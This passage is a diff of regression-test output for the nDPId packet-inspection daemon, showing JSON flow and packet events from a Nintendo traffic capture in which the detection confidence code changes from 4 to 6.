-01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} -00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1500731342849,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342849,"pkt":"AA6OGXEMfLuKifuECABFAABoEaUAAAQRdQ7AqAxyuXapQdpra4AAVCIdMquYZAIAAADswAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4rX5hDUY6wfFQBAZE4XnJazusJzbVQnhevgQppjVzdvQ=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1500731342850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342850,"pkt":"AA6OGXEMfLuKifuECABFAABoEaYAAAQRdQ3AqAxyuXapQdpra4AAVAI0MquYZAIAAADswQAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6gjif1bWs4geU7XixG1qL9vpm\/9BWOrfz2cCbEeSTC5w=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1500731342850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342850,"pkt":"AA6OGXEMfLuKifuECABFAABoEacAAAQRdQzAqAxyuXapQdpra4AAVKPSMquYZAIAAADswQAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6PDZdQtmr\/jnYvUCnbuXCGD7lHXmsq3069ZX\/zt70P0A=="} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1500731342860,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsAWRkAAAAARQAAaBGlAAABEXgOwKgMcrl2qUHaa2uAAFRVpg=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.249867} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342860,"flow_last_seen":1500731342860,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731342860,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.249867} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1500731342860,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsAeQIAAAAARQAAaBGmAAABEXgNwKgMcrl2qUHaa2uAAFQ1vQ=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1500731342860,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731342860,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBoj+XBrhkwKgMcgsA12MAAAAARQAAaBGnAAABEXgMwKgMcrl2qUHaa2uAAFTXWw=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1500731343061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343061,"pkt":"AA6OGXEMfLuKifuECABFAABoEawAAAQR9ebAqAxyXe2D69pr2wIAVCbFMquYZAIAAADtlwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4hx\/onxePqCY4SU3xjlxtsTZQnwdACOZdpevYKG6n8bw=="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343061,"flow_last_seen":1500731343061,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343061,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1500731343062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343062,"pkt":"AA6OGXEMfLuKifuECABFAABoEa0AAAQR9eXAqAxyXe2D69pr2wIAVEC8MquYZAIAAADtlwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+6trKJ4rbcL8S1NPouV27EIOISc3sHWS\/Ay6NZ9dnLpeA=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1500731343064,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343064,"pkt":"AA6OGXEMfLuKifuECABFAABoEa4AAAQR9eTAqAxyXe2D69pr2wIAVHIfMquYZAIAAADtmAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4QxoxAISmRWzt9Cf2ANrWvuCF9xJxAb2QUBmXaTP0ETQ=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1500731343266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343266,"pkt":"AA6OGXEMfLuKifuECABFAABoEbUAAAQR5+7AqAxyUT2eitpryjkAVFv5MquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+5+fKxnOL+boQLScYxPZys77lNbziI76pb\/g4qlyspVqA=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343266,"flow_last_seen":1500731343266,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731343266,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1500731343266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343266,"pkt":"AA6OGXEMfLuKifuECABFAABoEbYAAAQR5+3AqAxyUT2eitpryjkAVGj9MquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+7xrfou4fqWjlJQi1c1lm8udR6QM9F6Tte6liKDWkKe\/w=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1500731343267,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731343267,"pkt":"AA6OGXEMfLuKifuECABFAABoEbcAAAQR5+zAqAxyUT2eitpryjkAVC1TMquYZAIAAADuYwAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+5Run8isLISlhuFklysgYAwVdq0TTDfSVfOsDm2ryNz2g=="} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1500731343274,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsAwIMAAAAARQAAaBG1AAABEeruwKgMclE9noraa8o5AFSPgg=="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731343274,"flow_last_seen":1500731343274,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731343274,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1500731343274,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsAs38AAAAARQAAaBG2AAABEertwKgMclE9noraa8o5AFSchg=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1500731343274,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1500731343274,"pkt":"fLuKifuEAA6OGXEMCABFAAA4AAAAAPwBokGXBrhiwKgMcgsA7ykAAAAARQAAaBG3AAABEerswKgMclE9noraa8o5AFRg3A=="} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 